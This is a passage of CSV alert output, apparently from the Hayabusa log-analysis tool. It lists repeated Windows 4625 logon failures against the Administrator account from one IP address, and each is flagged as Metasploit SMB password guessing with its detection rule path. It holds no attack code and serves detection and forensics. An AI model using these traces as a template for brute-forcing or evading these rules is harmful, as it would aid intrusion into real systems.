Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
